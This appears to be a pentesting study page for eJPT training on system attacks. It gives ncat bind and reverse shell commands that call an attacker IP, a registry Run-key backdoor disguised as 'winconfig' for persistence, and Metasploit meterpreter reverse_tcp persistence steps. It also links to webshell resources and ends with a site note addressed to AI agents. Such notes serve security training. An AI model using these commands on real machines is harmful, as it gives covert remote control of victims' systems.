# ⚙️System Attacks ## Classification: ![](/files/-MgQVAxoW7z6TnO3sOAf) ## 🚪Backdoor ### Ncat ``` ncat [options] [hostname] [port] ``` install it in the victim machine and run it with these commands: ``` ncat -l -p 5555 -e cmd.exe ``` > -l listen -e: excute file we choose cmd so we can excute commands. attacker will ``` ncat [victim_ip] 5555 ``` #### can also be executed as a reverse listener especially when the target is on another network: in the Attacker machine listen: ``` ncat -l -p 5555 -v ``` > -v: for verbose give us output. in the target machine: ``` ncat -e cmd.exe {attacker_ip} 5555 ``` #### Persistent Backdoor: in windows Register Editor in \`HKEY\_*LOCALMACHINE\SOFTWARE\Microsoft\CurrentVersion\Run\` we add string value for our ncat (or whatever we name it in the target machine) add command to run* : ``` which's the path to ncat (here it's re-named as winconfig) {Attacker_IP} {Port} -e cmd.exe ``` ![](/files/-MgRuIxXW_fhvq6vqs4j) then restart the victim machine. as soon as they logged in the attacker who's listening will et a shell. ### Metasploit using the **Meterpreter** (which's just like ncat above but with steroids). [**`Meterpreter:`**](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/) is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code. Get persistence in target machine: after hacking one machine you will have already a session that you can browse with `sessions` command: ``` use exploit/windows/loca/s4u_persistence sessions //see all the sessions you have set session //pick session to stay persistent set trigger logon //whenever target login you will have conn set payload windows/meterpreter/reverse_tcp //whatever payload //same as the attack you used to gain access from first place and gett ths session set lhost set lport ``` starter listener: ``` use exploit/multi/handler set payload windows/meterpreter/reverse_tcp exploit ``` ## 🔐Password Attacks {% content-ref url="/pages/-Mgg4fupiXcG0Fphi-zd" %} [🔐Password Attacks](/shifrablog/pentesting/ejpt/password-attacks.md) {% endcontent-ref %} ## 💦Buffer Overflow ## Shell: a program that executes commands, check this to see various languages and ways to execute a system commands(getting a shell): {% embed url="" %} open source webshells (read them before uploading them to a web server): {% embed url="" %}
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mo-ela.gitbook.io/shifrablog/pentesting/ejpt/system-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.